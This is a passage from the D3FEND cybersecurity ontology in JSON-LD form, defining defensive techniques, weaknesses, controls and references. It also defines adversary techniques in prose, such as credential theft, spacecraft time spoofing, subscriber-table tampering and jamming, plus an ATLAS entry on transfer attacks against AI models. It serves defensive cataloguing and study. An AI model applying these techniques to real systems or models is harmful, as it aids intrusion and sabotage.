        "d3f:AuthorizationEventThresholding"
      ],
      "d3f:analyzes": {
        "@id": "d3f:Authorization"
      },
      "d3f:created": {
        "@type": "xsd:dateTime",
        "@value": "2020-08-05T00:00:00"
      },
      "d3f:d3fend-id": "D3-AZET",
      "d3f:definition": "Collecting authorization events, creating a baseline user profile, and determining whether authorization events are consistent with the baseline profile.",
      "d3f:kb-article": "## How it works\n\nAuthorization event data is collected to create a baseline user profile. Authorization events that deviate from the baseline and exceed a static or dynamic threshold are identified for further action. Authorization events can include successful and failed authorization attempts as well as events related to permissions including viewing, editing, deleting, creating files, databases etc.\n\n## Considerations\n\nDepending on the complexity of the data considered, outliers may not be obvious to a human analyst reviewing events in simplistic analytic views. If malicious activity is not statistically different from benign activity, an alert threshold will not be met.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MethodAndApparatusForNetworkFraudDetectionAndRemediationThroughAnalytics_IdaptiveLLC"
        },
        {
          "@id": "d3f:Reference-SMBSessionSetups_MITRE"
        },
        {
          "@id": "d3f:Reference-UserLoggedInToMultipleHosts_MITRE"
        },
        {
          "@id": "d3f:Reference-System,Method,AndComputerProgramProductForDetectingAndAssessingSecurityRisksInANetwork_ExabeamInc"
        }
      ],
      "rdfs:label": "Authorization Event Thresholding",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserBehaviorAnalysis"
        },
        {
          "@id": "_:N8f6a42f0fc5c4c37b84a3a82ec18238a"
        }
      ]
    },
    {
      "@id": "_:N8f6a42f0fc5c4c37b84a3a82ec18238a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authorization"
      }
    },
    {
      "@id": "d3f:CWE-532",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-532",
      "d3f:definition": "The product writes sensitive information to a log file.",
      "rdfs:label": "Insertion of Sensitive Information into Log File",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-538"
      }
    },
    {
      "@id": "d3f:Reference-NIST-Special-Publication-800-41-Revision-1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://doi.org/10.6028/NIST.SP.800-41r1"
      },
      "d3f:kb-abstract": "Firewalls are devices or programs that control the flow of network traffic between networks or hosts employing differing security postures. This publication provides an overview of several types of firewall technologies and discusses their security capabilities and their relative advantages and disadvantages in detail. It also makes recommendations for establishing firewall policies and for selecting, configuring, testing, deploying, and managing firewall solutions.",
      "d3f:kb-organization": "NIST",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:Endpoint-basedWebServerAccessMediation"
        },
        {
          "@id": "d3f:Proxy-basedWebServerAccessMediation"
        },
        {
          "@id": "d3f:WebSessionAccessMediation"
        }
      ],
      "d3f:kb-reference-title": "Special Publication 800-41 Revision 1 Guidelines on Firewalls and Firewall Policy",
      "rdfs:label": "Reference - Special Publication 800-41 Revision 1 Guidelines on Firewalls and Firewall Policy"
    },
    {
      "@id": "d3f:WindowsSuspendThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Suspends the specified thread.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNtSuspendThread"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-suspendthread"
      },
      "rdfs:label": "Windows SuspendThread",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISuspendThread"
        },
        {
          "@id": "_:Nd904f79b9a04471d891d2ad98df04299"
        }
      ]
    },
    {
      "@id": "_:Nd904f79b9a04471d891d2ad98df04299",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtSuspendThread"
      }
    },
    {
      "@id": "d3f:Reference-RFC3411-AnArchitectureForDescribingSimpleNetworkManagementProtocolSNMPManagementFrameworks",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://https://datatracker.ietf.org/doc/html/rfc3411"
      },
      "d3f:kb-author": "D. Harrington, R. Presuhn, B. Wijnen",
      "d3f:kb-organization": "Internet Engineering Task Force (IETF)",
      "d3f:kb-reference-of": {
        "@id": "d3f:HardwareComponentInventory"
      },
      "d3f:kb-reference-title": "An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks",
      "rdfs:label": "Reference - An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks"
    },
    {
      "@id": "d3f:CWE-1264",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1264",
      "d3f:definition": "The hardware logic for error handling and security checks can incorrectly forward data before the security check is complete.",
      "rdfs:label": "Hardware Logic with Insecure De-Synchronization between Control and Data Channels",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-821"
      }
    },
    {
      "@id": "d3f:CWE-104",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-104",
      "d3f:definition": "If a form bean does not extend an ActionForm subclass of the Validator framework, it can expose the application to other weaknesses related to insufficient input validation.",
      "rdfs:label": "Struts: Form Bean Does Not Extend Validation Class",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-573"
      }
    },
    {
      "@id": "d3f:TimerModificationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event in which the duration or expiration time of an active timer is changed.",
      "rdfs:label": "Timer Modification Event",
      "rdfs:subClassOf": {
        "@id": "d3f:SoftwareTimerEvent"
      }
    },
    {
      "@id": "d3f:TrimmedMean",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-TM",
      "d3f:definition": "The arithmetic mean of data values after a certain number or proportion of the highest and lowest data values have been discarded.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Central tendency. [Link](https://en.wikipedia.org/wiki/Central_tendency)",
      "d3f:synonym": "Truncated mean",
      "rdfs:label": "Trimmed Mean",
      "rdfs:subClassOf": {
        "@id": "d3f:CentralTendency"
      }
    },
    {
      "@id": "d3f:TA0006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to steal account names and passwords.\n\nCredential Access consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include keylogging or credential dumping. Using legitimate credentials can give adversaries access to systems, make them harder to detect, and provide the opportunity to create more accounts to help achieve their goals.",
      "d3f:display-order": 6,
      "rdfs:label": "Credential Access",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:T1585.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1585.001",
      "d3f:definition": "Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)",
      "rdfs:label": "Social Media Accounts",
      "rdfs:subClassOf": {
        "@id": "d3f:T1585"
      }
    },
    {
      "@id": "d3f:ImportLibraryFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Loads an external software library to enable the invocations of its methods.",
      "d3f:loads": {
        "@id": "d3f:SharedLibraryFile"
      },
      "rdfs:label": "Import Library Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:N9cb19f34064d4485a98a0fefc5355fe4"
        }
      ]
    },
    {
      "@id": "_:N9cb19f34064d4485a98a0fefc5355fe4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:loads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "d3f:EX-0012.04",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0012.04",
      "d3f:definition": "In publish/subscribe flight frameworks, applications and subsystems register interest in specific message classes via subscriber (or application) tables. These tables map message IDs/topics to subscribers, define delivery pipes/queues, and often include filters, priorities, and rate limits. By altering these mappings, an adversary can quietly reshape information flow: critical consumers stop receiving health or sensor messages; non-critical tasks get flooded; handlers are rebound so an opcode or message ID reaches the wrong task; or duplicates create feedback loops that consume bandwidth and CPU. Because subscription state is usually read at init or refreshed on command, subtle edits can persist across reboots or take effect at predictable times. Similar effects appear in legacy MIL-STD-1553 deployments by modifying Remote Terminal (RT), subaddress, or mode-code configurations so that messages are misaddressed or dropped at the bus interface. The net result is control-by-misdirection: the software still “works,” but the right data no longer reaches the right recipient at the right time.",
      "rdfs:label": "App/Subscriber Tables - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/04/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0012"
      },
      "skos:prefLabel": "App/Subscriber Tables"
    },
    {
      "@id": "d3f:CCI-002425_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to conceal or randomize communication patterns unless otherwise protected by organization-defined alternative physical safeguards.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002425"
    },
    {
      "@id": "d3f:TimeRecord",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A time record either records, describes, represents, or is generally about Time.",
      "d3f:records": {
        "@id": "d3f:Time"
      },
      "rdfs:label": "Time Record",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Record"
        },
        {
          "@id": "_:N49c85fc69e3e431e8e829728ceb7e3be"
        }
      ]
    },
    {
      "@id": "_:N49c85fc69e3e431e8e829728ceb7e3be",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:records"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Time"
      }
    },
    {
      "@id": "d3f:Simulation",
      "@type": "owl:Class",
      "rdfs:label": "Simulation",
      "rdfs:subClassOf": {
        "@id": "d3f:Generation"
      }
    },
    {
      "@id": "d3f:PolicyGradient",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PG",
      "d3f:definition": "The objective of a Reinforcement Learning Policy Gradient agent is to maximize the “expected” reward when following a policy",
      "d3f:kb-article": "## References\nPolicy Gradients in a Nutshell. Towards Data Science.  [Link](https://towardsdatascience.com/policy-gradients-in-a-nutshell-8b72f9743c5d).",
      "rdfs:label": "Policy Gradient",
      "rdfs:subClassOf": {
        "@id": "d3f:Model-freeReinforcementLearning"
      }
    },
    {
      "@id": "d3f:T1212",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1212",
      "d3f:definition": "Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. ",
      "d3f:may-access": [
        {
          "@id": "d3f:AuthenticationService"
        },
        {
          "@id": "d3f:CredentialManagementSystem"
        }
      ],
      "d3f:may-modify": [
        {
          "@id": "d3f:ProcessCodeSegment"
        },
        {
          "@id": "d3f:StackFrame"
        }
      ],
      "rdfs:label": "Exploitation for Credential Access",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:N19821680ff2f4186938007f0e991a577"
        },
        {
          "@id": "_:N9ed7732fff344df79e17b07b2339a9d2"
        },
        {
          "@id": "_:Nf332db5f1d1944a2ac3472ee483c14c0"
        },
        {
          "@id": "_:N383886db24c74f4a94485222ad998ae2"
        }
      ]
    },
    {
      "@id": "_:N19821680ff2f4186938007f0e991a577",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationService"
      }
    },
    {
      "@id": "_:N9ed7732fff344df79e17b07b2339a9d2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CredentialManagementSystem"
      }
    },
    {
      "@id": "_:Nf332db5f1d1944a2ac3472ee483c14c0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCodeSegment"
      }
    },
    {
      "@id": "_:N383886db24c74f4a94485222ad998ae2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:StackFrame"
      }
    },
    {
      "@id": "d3f:WebResource",
      "@type": "owl:Class",
      "d3f:definition": "A web resource is a resource identified by a Uniform Resource Identifier (URI) and made available from one host to another host via a web protocol and across a network or networks.",
      "rdfs:label": "Web Resource",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Web_resource"
        },
        {
          "@id": "https://schema.ocsf.io/objects/web_resource"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkResource"
      }
    },
    {
      "@id": "d3f:EX-0016",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0016",
      "d3f:definition": "Jamming is an electronic attack that uses radio frequency signals to interfere with communications. A jammer must operate in the same frequency band and within the field of view of the antenna it is targeting. Unlike physical attacks, jamming is completely reversible, once the jammer is disengaged, communications can be restored. Attribution of jamming can be tough because the source can be small and highly mobile, and users operating on the wrong frequency or pointed at the wrong satellite can jam friendly communications.* Similiar to intentional jamming, accidential jamming can cause temporary signal degradation. Accidental jamming refers to unintentional interference with communication signals, and it can potentially impact spacecraft in various ways, depending on the severity, frequency, and duration of the interference.\n\n*https://aerospace.csis.org/aerospace101/counterspace-weapons-101",
      "rdfs:label": "Jamming - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0016/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExecutionTechnique"
      },
      "skos:prefLabel": "Jamming"
    },
    {
      "@id": "d3f:OTNetworkManagementCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Manage message routing or network connection mechanisms.",
      "rdfs:label": "OT Network Management Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTEvent"
        },
        {
          "@id": "_:N9e87922684fe4cb082572450b8eb6709"
        }
      ]
    },
    {
      "@id": "_:N9e87922684fe4cb082572450b8eb6709",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTNetworkManagementCommand"
      }
    },
    {
      "@id": "d3f:Software-definedRadioWaveformLoadEvent",
      "@type": "owl:Class",
      "d3f:definition": "An SDR event where a waveform application (software/firmware/FPGA image and associated descriptors) has been installed or selected on the SDR and is available to be configured.",
      "rdfs:label": "Software-defined Radio Waveform Application Load Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Software-definedRadioEvent"
        },
        {
          "@id": "_:N5653ad754f6140228a984395641ffe9e"
        },
        {
          "@id": "_:N9eda2b4c4b7f4708a334f9d71340f0eb"
        }
      ]
    },
    {
      "@id": "_:N5653ad754f6140228a984395641ffe9e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadioComputer"
      }
    },
    {
      "@id": "_:N9eda2b4c4b7f4708a334f9d71340f0eb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadioWaveformApplication"
      }
    },
    {
      "@id": "d3f:LinuxMunmap",
      "@type": "owl:Class",
      "d3f:definition": "Unmap files or devices from memory.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/munmap.2.html"
      },
      "rdfs:label": "Linux Munmap",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIFreeMemory"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SI-2_5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Flaw Remediation | Automatic Software and Firmware Updates",
      "d3f:exactly": [
        {
          "@id": "d3f:FirmwareVerification"
        },
        {
          "@id": "d3f:PeripheralFirmwareVerification"
        },
        {
          "@id": "d3f:SoftwareUpdate"
        },
        {
          "@id": "d3f:SystemFirmwareVerification"
        }
      ],
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "SI-2(5)"
    },
    {
      "@id": "d3f:T1536",
      "@type": "owl:Class",
      "d3f:attack-id": "T1536",
      "d3f:definition": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1578.004",
      "rdfs:label": "Revert Cloud Instance",
      "rdfs:seeAlso": {
        "@id": "d3f:T1578.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:EX-0014.01",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0014.01",
      "d3f:definition": "Time underpins sequencing, anti-replay, navigation filtering, and data labeling. An attacker that forges or biases the time seen by onboard consumers can reorder stored command execution, break timetag validation, desynchronize counters, and misalign estimation windows. Spoofing vectors include manipulating the distributed time service, introducing a higher-priority/cleaner time source (e.g., GNSS-derived time), or crafting messages that cause clock discipline to slew toward attacker-chosen values. Once time shifts, autonomous routines keyed to epochs, wheel unloads, downlink starts, heater schedules, fire early/late or not at all, and telemetry appears inconsistent to ground analysis. The signature is correct-looking time metadata that steadily or abruptly departs from truth, driving downstream logic to act at the wrong moment.",
      "rdfs:label": "Time Spoof - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0014/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0014"
      },
      "skos:prefLabel": "Time Spoof"
    },
    {
      "@id": "d3f:Reference-InferentialExploitAttemptDetection_CrowdstrikeInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10216934B2/en?oq=US-10216934-B2"
      },
      "d3f:kb-abstract": "A security agent implemented on a monitored computing device is described herein. The security agent is configured to detect an action of interest (AoI) that may be probative of a security exploit and to determine a context in which that AoI occurred. Based on that context, the security agent is further configured to decide whether the AoI is a security exploit and can take preventative action to prevent the exploit from being completed.\n\nDetermining that the AoI includes the security exploit is based at least in part on one or more of: determining that the return address is outside memory previously allocated for an object; determining that the object identifier is associated with a vulnerable object; determining that permissions of the memory region include two or more of read, write, and execute; or determining that the memory region is one page in length.\n\nDetermining that the return address is outside memory previously allocated for an object and the method further including treating code that the return address points to as malicious code.",
      "d3f:kb-author": "Daniel W. Brown; Ion-Alexandru Ionescu; Loren C. Robinson",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Crowdstrike Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:MemoryBoundaryTracking"
      },
      "d3f:kb-reference-title": "Inferential exploit attempt detection",
      "rdfs:label": "Reference - Inferential exploit attempt detection - Crowdstrike Inc"
    },
    {
      "@id": "d3f:Event",
      "@type": "owl:Class",
      "d3f:definition": "An Event is an occurrence or action within a system, process, or environment within a finite span of time.",
      "rdfs:label": "Event",
      "rdfs:subClassOf": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "d3f:CWE-184",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-184",
      "d3f:definition": "The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete.",
      "d3f:synonym": [
        "Blacklist / Black List",
        "Blocklist / Block List",
        "Denylist / Deny List"
      ],
      "rdfs:label": "Incomplete List of Disallowed Inputs",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1023"
        },
        {
          "@id": "d3f:CWE-693"
        }
      ]
    },
    {
      "@id": "d3f:GraphicsProcessingUnit",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:GraphicsCardFirmware"
      },
      "d3f:definition": "A Graphics Processing Unit (GPU) is a specialized processor designed to efficiently perform parallel computations, primarily for rendering graphics and visual data.",
      "d3f:synonym": "GPU",
      "rdfs:label": "Graphics Processing Unit",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Processor"
        },
        {
          "@id": "_:Nfaa3aa015a7d48bca797de9f165db743"
        }
      ]
    },
    {
      "@id": "_:Nfaa3aa015a7d48bca797de9f165db743",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GraphicsCardFirmware"
      }
    },
    {
      "@id": "d3f:ProcessLineageAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ProcessLineageAnalysis"
      ],
      "d3f:analyzes": [
        {
          "@id": "d3f:Process"
        },
        {
          "@id": "d3f:ProcessTree"
        }
      ],
      "d3f:d3fend-id": "D3-PLA",
      "d3f:definition": "Identification of suspicious processes executing on an end-point device by examining the ancestry and siblings of a process, and the associated metadata of each node on the tree, such as process execution, duration, and order relative to siblings and ancestors.",
      "d3f:kb-article": "## How it works\nProcess tree analysis techniques gather information on how a process was initiated to determine if a process is malicious. For example, if a process was not initiated from boot or not initiated by another process, that process is identified as suspicious. Also, if a new process was started before a process initiated by the device (ex. during boot) and that new process was not initiated by a user (which can be determined by examining process parameters such as type of process, its creator, source, etc.) the process is identified as suspicious.\n\nFor example, Microsoft Word may block execution of any subprocess that is not in an approved path.\n\n## Considerations\n* Attackers may spoof the parent PID (https://attack.mitre.org/techniques/T1502/), rendering such after-the-fact analysis on process lineage ineffective.\n* Processes may hide from various means of detection; an example on Linux is where a rootkit might remove key files for the process from its directory in /proc.\n* Zombie processes.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CommandLaunchedFromWinLogon_MITRE"
        },
        {
          "@id": "d3f:Reference-DebuggersForAccessibilityApplications_MITRE"
        },
        {
          "@id": "d3f:Reference-GenericRegsvr32_MITRE"
        },
        {
          "@id": "d3f:Reference-OutlierParentsOfCmd_MITRE"
        },
        {
          "@id": "d3f:Reference-ProcessesSpawningCmd.exe_MITRE"
        },
        {
          "@id": "d3f:Reference-QuickExecutionOfASeriesOfSuspiciousCommands_MITRE"
        },
        {
          "@id": "d3f:Reference-Reg.exeCalledFromCommandShell_MITRE"
        },
        {
          "@id": "d3f:Reference-RemotelyLaunchedExecutablesViaWMI_MITRE"
        },
        {
          "@id": "d3f:Reference-ServiceOutlierExecutables_MITRE"
        },
        {
          "@id": "d3f:Reference-ServiceSearchPathInterception_MITRE"
        },
        {
          "@id": "d3f:Reference-ServicesLaunchingCmd_MITRE"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodsThereofForCausalityIdentificationAndAttributionsDeterminationOfProcessesInANetwork_PaloAltoNetworksIncCyberSecdoLtd"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodsThereofForIdentificationOfSuspiciousSystemProcesses_PaloAltoNetworksInc"
        },
        {
          "@id": "d3f:Reference-UACBypass_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-11-002%3ALocalNetworkSniffing_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-11-004%3AProcessesStartedFromIrregularParent_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-02-002%3AGetSystemElevation_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-05-003%3ABCDEditFailureRecoveryModification_MITRE"
        }
      ],
      "d3f:synonym": "Process Tree Analysis",
      "rdfs:label": "Process Lineage Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessSpawnAnalysis"
        },
        {
          "@id": "_:Ne33479ce26744f9da33e9a4b96ba65ab"
        },
        {
          "@id": "_:Nacc7ed2da52e4d29ade80666992061fc"
        }
      ]
    },
    {
      "@id": "_:Ne33479ce26744f9da33e9a4b96ba65ab",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "_:Nacc7ed2da52e4d29ade80666992061fc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessTree"
      }
    },
    {
      "@id": "d3f:CCI-001682_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system automatically removes or disables emergency accounts after an organization-defined time period for each type of account.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2011-05-03T00:00:00"
      },
      "rdfs:label": "CCI-001682"
    },
    {
      "@id": "d3f:ARM32CodeSegment",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ImageCodeSegment",
        "d3f:ProcessCodeSegment"
      ],
      "rdfs:label": "ARM32 Code Segment"
    },
    {
      "@id": "d3f:Reference-CPGChecklist",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.cisa.gov/resources-tools/resources/cisa-cpg-checklist"
      },
      "d3f:kb-abstract": "This document is to be used in tandem with the CPGs to help prioritize and track your organization's implementation.",
      "d3f:kb-author": "CISA",
      "d3f:kb-reference-of": {
        "@id": "d3f:ChangeDefaultPassword"
      },
      "d3f:kb-reference-title": "CISA CPG Checklist",
      "rdfs:label": "Reference - CISA CPG Checklist"
    },
    {
      "@id": "d3f:T1008",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1008",
      "d3f:definition": "Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "Fallback Channels",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:N70d3fa69e9a147d6b8269340702dc103"
        }
      ]
    },
    {
      "@id": "_:N70d3fa69e9a147d6b8269340702dc103",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:BSDProcess",
      "@type": [
        "owl:NamedIndividual",
        "d3f:Process"
      ],
      "rdfs:label": "BSD Process"
    },
    {
      "@id": "d3f:CCI-000880_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization audits non-local maintenance and diagnostic sessions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:OperatingSystemMonitoring"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-18T00:00:00"
      },
      "rdfs:label": "CCI-000880"
    },
    {
      "@id": "d3f:AML.T0043.002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0043.002",
      "d3f:definition": "In Black-Box Transfer attacks, the adversary uses one or more proxy models (trained via [Create Proxy AI Model](/techniques/AML.T0005) or [Train Proxy via Replication](/techniques/AML.T0005.001)) they have full access to and are representative of the target model.\nThe adversary uses [White-Box Optimization](/techniques/AML.T0043.000) on the proxy models to generate adversarial examples.\nIf the set of proxy models are close enough to the target model, the adversarial example should generalize from one to another.\nThis means that an attack that works for the proxy models will likely then work for the target model.\nIf the adversary has [AI Model Inference API Access](/techniques/AML.T0040), they may use [Verify Attack](/techniques/AML.T0042) to confirm the attack is working and incorporate that information into their training process.",
      "rdfs:label": "Black-Box Transfer - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0043.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0043"
      },
      "skos:prefLabel": "Black-Box Transfer"
    },
    {
      "@id": "d3f:CWE-611",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-611",
      "d3f:definition": "The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.",
      "d3f:synonym": "XXE",
      "d3f:weakness-of": {
        "@id": "d3f:ExternalContentInclusionFunction"
      },
      "rdfs:label": "Improper Restriction of XML External Entity Reference",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-610"
        },
        {
          "@id": "_:Na02a0a4d8de6442e9be89849e0a4c4a2"
        }
      ]
    },
    {
      "@id": "_:Na02a0a4d8de6442e9be89849e0a4c4a2",
